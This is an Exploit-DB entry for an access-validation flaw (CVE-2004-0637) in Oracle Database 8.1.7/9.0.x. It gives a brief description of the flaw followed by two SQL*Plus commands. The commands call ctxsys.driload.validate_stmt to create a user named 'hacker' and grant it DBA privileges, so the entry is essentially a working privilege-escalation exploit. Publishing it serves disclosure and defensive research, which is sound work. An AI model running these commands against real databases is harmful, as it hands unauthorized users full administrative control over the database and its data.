Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation

EDB-ID:

24567

CVE:

2004-0637

EDB Verified:

Author:

Alexander Kornbrust

Type:

remote

Exploit: /

Platform:

Multiple

Date:

2004-09-03

Vulnerable App:

source: https://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services